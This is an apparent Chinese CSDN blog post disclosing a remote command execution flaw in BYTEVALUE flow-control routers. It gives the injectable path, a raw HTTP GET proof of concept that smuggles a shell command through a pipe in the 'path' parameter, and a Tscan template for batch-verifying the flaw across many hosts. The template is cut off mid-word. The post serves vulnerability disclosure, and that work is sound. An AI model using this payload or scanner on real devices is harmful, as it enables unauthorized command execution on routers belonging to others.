BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)

本文介绍了BYTEVALUE流控路由器的一个远程命令执行漏洞,详细描述了漏洞情况,提供了复现步骤及POC使用方法,并给出了修复建议。针对网络安全,尤其是Web安全领域,该漏洞的发现和修复对于提升设备安全性至关重要。
摘要由CSDN通过智能技术生成

0x01漏洞描述

BYTEVALUE百为流控路由拥有强大的多线分流,多线叠加负载均衡功能,加上领先的智能流控QOS技术能解决网吧,小区等公共营业场所带宽不够的难题。该路由器存在远程命令执行漏洞。

0x02漏洞复现

(1)payload利用地址:

/goform/webRead/open/?path=|echo+12345

(2)命令执行POC:

GET /goform/webRead/open/?path=|echo+12345 HTTP/1.1
Host: 127.0.0.1
Accept: */*
Connection: Keep-Alive

0x03POC使用(Tscan验证)

params: []
name: BYTEVALUE 百为流控路由器远程命令漏洞
set:
a1: randomLowercase(8)
rules:



method: GET
path: /goform/webRead/open/?path=|echo+{
  {a1}}
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(a1)))
gro
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值